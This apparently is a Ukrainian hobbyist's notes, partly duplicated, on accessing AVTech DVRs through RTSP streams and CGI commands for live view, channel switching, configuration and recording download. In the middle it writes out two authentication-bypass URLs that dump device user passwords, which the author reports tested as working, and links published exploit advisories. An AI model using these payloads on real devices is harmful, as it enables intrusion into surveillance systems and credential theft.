Хотів для себе накидати нотатки як підключатися до відеореєстратора фірми AVTech.
А вийшло трохи більше.
А ще, головна мета знайти як отримати повідомлення про подію з відеореєстратора що потім зчитати фрагмент цього запису. Без використання рідного програмного забезпечення.
rtsp://DVR_URL/live/mpeg4
rtsp://DVR_URL/live/h264
Перегляд зі звуком:
rtsp://DVR_URL/live/mpeg4_ulaw
rtsp://DVR_URL/live/h264_ulaw
With ch.:
rtsp://DVR_URL/live/h264/ch0 - MAIN
rtsp://DVR_URL/live/h264/ch1 .. ch8 ... by ch.
C# Camera SDK: How to connect to your AVTECH IP camera
Одне зображення:
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=JPEG&resolution=CIF
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=JPEG&resolution=4CIF
Послідовність MJPEG
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=MJPEG
http://DVR_URL/nobody/m2.htm?ch=1&rf=3&dep=1 - ch1
data=02 3E 00 00 23 - ch8
data=02 3D 00 00 23 - ch7
data=02 3C 00 00 23 - ch6
data=02 3B 00 00 23 - ch5
data=02 3A 00 00 23 - ch4
data=02 39 00 00 23 - ch3
data=02 38 00 00 23 - ch2
data=02 37 00 00 23 - ch1
data=02 1A 00 00 23 - cut1-4 and next cut4-8
data=02 19 00 00 23 - cut9
А ще, головна мета знайти як отримати повідомлення про подію з відеореєстратора що потім зчитати фрагмент цього запису. Без використання рідного програмного забезпечення.
URLS:
Перегляд за допомогою VLC player без звуку:rtsp://DVR_URL/live/mpeg4
rtsp://DVR_URL/live/h264
Перегляд зі звуком:
rtsp://DVR_URL/live/mpeg4_ulaw
rtsp://DVR_URL/live/h264_ulaw
With ch.:
rtsp://DVR_URL/live/h264/ch0 - MAIN
rtsp://DVR_URL/live/h264/ch1 .. ch8 ... by ch.
C# Camera SDK: How to connect to your AVTECH IP camera
Одне зображення:
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=JPEG&resolution=CIF
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=JPEG&resolution=4CIF
Послідовність MJPEG
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=MJPEG
INFORMATION:
FOR ALL : http://DVR_URL/cgi-bin/nobody/Machine.cgi?action=get_capabilityMOBILE VIEW:
http://DVR_URL/nobody/mobile480.htm?Login=Captcha - main viewhttp://DVR_URL/nobody/m2.htm?ch=1&rf=3&dep=1 - ch1
Change main view ch:
http://DVR_URL/cgi-bin/user/Serial.cgi?action=write&device=MASTER&data=02 3C 00 00 23&sid=0.22579487226719663 - ch6data=02 3E 00 00 23 - ch8
data=02 3D 00 00 23 - ch7
data=02 3C 00 00 23 - ch6
data=02 3B 00 00 23 - ch5
data=02 3A 00 00 23 - ch4
data=02 39 00 00 23 - ch3
data=02 38 00 00 23 - ch2
data=02 37 00 00 23 - ch1
data=02 1A 00 00 23 - cut1-4 and next cut4-8
data=02 19 00 00 23 - cut9
Change Resolution and Quality
http://DVR_URL/cgi-bin/nobody/Machine.cgi?action=get_capability 0 OK Firmware.Version=1133-1039-1013-1025-0a-0000 MACAddress=00:0X:XX:XX:XX:XX Product.Type=DVR Product.ID=672 Product.ShortName=None Video.System=PAL Video.Input.Num=4 Video.Output.Num=1 Video.Format=H264,MJPEG Video.Format.Default=H264 Video.Resolution=4CIF,CIF Video.Quality=BEST,HIGH,NORMAL,BASIC Video.Local.Input.Num=4 Video.Local.Output.Num=1 Video.Local.Format=H264,MJPEG Audio.Input.Num=0 Audio.Output.Num=0 Audio.Format=ULAW Audio.Local.Input.Num=1 Audio.Local.Output.Num=1 Audio.Local.Format=PCM Language.Default=ENGLISH Language.Support=ENGLISH&CHINESE&JAPANESE&FRANCE&GERMAN&SPANISH&CUSTOMIZE&THAI&VIETNAM&DUTCH&GREEK&ARABIC&CZECH&HUNGARIAN& Capability=0,0,0,0Set param Quality=BEST,Resolution=4CIF
http://DVR_URL/cgi-bin/user/Config.cgi?action=set&Video.I0.H264.Quality=BEST&Video.I0.H264.Resolution=4CIF&rnd=0.1511
А тут знайшов про баги не закриті у прошивках.
AVTECH EXPLOITS: https://www.exploit-db.com/exploits/40500
GET USERS PASSWORD!!!! :
http://DVR_URL/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
http://DVR_URL/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*
TESTED !!!! WORKS, CRAZY
https://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities
Status
By some CGI Tutorials:
- AVTECH CGI Command Set Specification 2.1 [Link1], [Link2]
- CGI_Tutorial.pdf [Link1] [Link2]
- CGI_Prikazy_stahovani_JPEG_snimku_z_kamer.txt
- CGI_prikazy_download_records.txt
URL: http://DVR_URL/cgi-bin/guest/SmartMonitor.cgi
Result:
0 OK SmartMonitor=AliveRequest: (POST)
URL: http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi
Parameter
Result:
Syntax:
http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&hdd_num=<hdd_num_value>&channel=<channel_value>&start_time=<start_time>&end_time=<end_time>
where format of start_time=2007 05 28 16 00 10 , end_time=2007 05 28 16 10 59
http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&type=<type_parameter>
http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&type=<type_parameter>&command=<command_parameter>&hdd_num=<hdd_num_value>&list_num=<list_num_value>&list_type=<list_type_parameter>
http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&hdd_num=<hdd_num_value>&start_time=<start_time>
http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&channel=<channel_value>&hdd_num=<hdd_num_value>&event=<event_parameter>&start_time=<start_time>
http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&command=<command_parameter>
where
<action_parameter> : download, query, playback, event_search, time_search, retr
<type_parameter> : hdd, search_list, dependent
<command_parameter> : forward, backward, latest, on, off
<list_type_parameter> : ALL, MANUAL, SYSTEM, ALARM, MOTION
<event_parameter> : alarm, motion
<hdd_num_value> : 1, 2, 3, …
<channel_value> : 1, 2, 3, …
<list_num_value> : 100
Example:
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=retr&command=on)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=event_search&channel=1&hdd_num=1&event=alarm&start_time=2007 10 16 13 00 00)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=time_search&hdd_num=1&start_time=2007 10 16 13 00 00)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=download&num=1&channel=1&start_time=2007 05 28 16 00 10&end_time=2007 05 28 16 10 59)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=query&type=search_list&command=latest&hdd_num=1&list_num=100&list_type=ALL)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=query&type=hdd)
